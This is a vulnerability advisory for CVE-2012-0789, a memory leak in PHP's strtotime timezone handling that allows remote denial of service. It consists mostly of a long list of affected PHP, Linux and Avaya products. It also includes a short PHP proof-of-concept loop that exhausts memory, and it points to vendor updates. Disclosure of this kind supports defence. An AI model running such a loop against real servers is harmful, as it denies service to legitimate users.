PHP CVE-2012-0789 Remote Denial Of Service Vulnerability

Bugtraq ID:	52043
Class:	Design Error
CVE:	CVE-2012-0789
Remote:	Yes
Local:	No
Published:	Dec 18 2011 12:00AM
Updated:	Mar 19 2015 09:48AM
Credit:	The vendor reported this issue.
Vulnerable:	SuSE SUSE Linux Enterprise Server for VMware 11 SP1 + Linux kernel 2.6.5 SuSE SUSE Linux Enterprise Server 11 SP2 + Linux kernel 2.6.5 SuSE SUSE Linux Enterprise Server 11 SP1 + Linux kernel 2.6.5 SuSE SUSE Linux Enterprise Server 10 SP4 + Linux kernel 2.6.5 SuSE SUSE Linux Enterprise Server 10 SP3 LTSS + Linux kernel 2.6.5 SuSE SUSE Linux Enterprise SDK 11 SP2 SuSE SUSE Linux Enterprise SDK 11 SP1 SuSE SUSE Linux Enterprise SDK 10 SP4 RedHat Enterprise Linux Desktop Workstation 5 client Red Hat Enterprise Linux Workstation Optional 6 Red Hat Enterprise Linux Workstation 6 Red Hat Enterprise Linux Server Optional 6 Red Hat Enterprise Linux Server 6 Red Hat Enterprise Linux HPC Node Optional 6 Red Hat Enterprise Linux HPC Node 6 Red Hat Enterprise Linux Desktop Optional 6 Red Hat Enterprise Linux 5 Server PHP PHP 5.3.8 PHP PHP 5.3.7 PHP PHP 5.3.6 PHP PHP 5.3.5 PHP PHP 5.3.2 PHP PHP 5.3.1 PHP PHP 5.3 PHP PHP 5.2.17 PHP PHP 5.2.15 PHP PHP 5.2.13 PHP PHP 5.2.12 PHP PHP 5.2.11 PHP PHP 5.2.10 PHP PHP 5.2.9 -2 PHP PHP 5.2.9 PHP PHP 5.2.8 PHP PHP 5.2.7 PHP PHP 5.2.6 PHP PHP 5.2.5 PHP PHP 5.2.4 PHP PHP 5.2.3 PHP PHP 5.2.2 PHP PHP 5.2.1 + Ubuntu Ubuntu Linux 7.04 sparc + Ubuntu Ubuntu Linux 7.04 powerpc + Ubuntu Ubuntu Linux 7.04 i386 + Ubuntu Ubuntu Linux 7.04 amd64 PHP PHP 5.1.6 PHP PHP 5.1.5 PHP PHP 5.1.4 PHP PHP 5.1.3 -RC1 PHP PHP 5.1.3 PHP PHP 5.1.2 + Ubuntu Ubuntu Linux 6.06 LTS sparc + Ubuntu Ubuntu Linux 6.06 LTS powerpc + Ubuntu Ubuntu Linux 6.06 LTS i386 + Ubuntu Ubuntu Linux 6.06 LTS amd64 PHP PHP 5.1.1 PHP PHP 5.1 PHP PHP 5.0.5 PHP PHP 5.0.4 PHP PHP 5.0.3 + Trustix Secure Linux 2.2 PHP PHP 5.0.2 PHP PHP 5.0.1 PHP PHP 5.3.5 PHP PHP 5.3.4 RC1 PHP PHP 5.3.4 PHP PHP 5.3.3 PHP PHP 5.3.10 PHP PHP 5.2.14 PHP PHP 5.2 + Debian Linux 4.0 sparc + Debian Linux 4.0 s/390 + Debian Linux 4.0 powerpc + Debian Linux 4.0 mipsel + Debian Linux 4.0 mips + Debian Linux 4.0 m68k + Debian Linux 4.0 ia-64 + Debian Linux 4.0 ia-32 + Debian Linux 4.0 hppa + Debian Linux 4.0 arm + Debian Linux 4.0 amd64 + Debian Linux 4.0 alpha + Debian Linux 4.0 Oracle Enterprise Linux 6.2 Oracle Enterprise Linux 6 Oracle Enterprise Linux 5 Gentoo Linux Avaya Voice Portal 5.1.2 Avaya Voice Portal 5.1.1 Avaya Voice Portal 5.1 SP1 Avaya Voice Portal 5.1 Avaya Voice Portal 5.0 SP2 Avaya Voice Portal 5.0 SP1 Avaya Voice Portal 5.0 Avaya IP Office Application Server 8.1 Avaya IP Office Application Server 8.0 Avaya IP Office Application Server 7.0 Avaya IP Office Application Server 6.1 Avaya IP Office Application Server 6.0 Avaya Aura Session Manager 5.2 SP2 Avaya Aura Session Manager 5.2 SP1 Avaya Aura Session Manager 5.2 Avaya Aura Messaging 6.1 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Messaging 6.0.1 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Messaging 6.0 Avaya Aura Communication Manager Utility Services 6.2 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Communication Manager Utility Services 6.1 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Communication Manager Utility Services 6.0 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Communication Manager 6.0.1 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Communication Manager 6.0 + Avaya Communication Manager Server DEFINITY Server SI/CS + Avaya Communication Manager Server S8100 + Avaya Communication Manager Server S8300 + Avaya Communication Manager Server S8500 + Avaya Communication Manager Server S8700 Avaya Aura Application Enablement Services 5.2.1 Avaya Aura Application Enablement Services 6.1.1 Avaya Aura Application Enablement Services 6.1 Avaya Aura Application Enablement Services 5.2.3 Avaya Aura Application Enablement Services 5.2.2 Avaya Aura Application Enablement Services 5.2
Not Vulnerable:	PHP PHP 5.3.9

PHP CVE-2012-0789 Remote Denial Of Service Vulnerability

PHP is prone to a remote denial-of-service vulnerability.

An attacker can exploit this issue to exhaust available memory, denying access to legitimate users.

PHP versions prior to 5.3.9 are vulnerable.

PHP CVE-2012-0789 Remote Denial Of Service Vulnerability

The following exploit is available:

<?php
while (true)
{
strtotime('Monday 00:00 Europe/Paris'); // Memory leak
}
?>

PHP CVE-2012-0789 Remote Denial Of Service Vulnerability

Solution:
Updates are available. Please see the references for details.

PHP CVE-2012-0789 Remote Denial Of Service Vulnerability

References:

• Bug 783609 - (CVE-2012-0789) CVE-2012-0789 PHP 5.3.8 strtotime timezone memory l (PHP)
  
• PHP Homepage (PHP)
  
• PHP Version 5.3.9 (PHP)
  
• strtotime with timezone memory leak (PHP)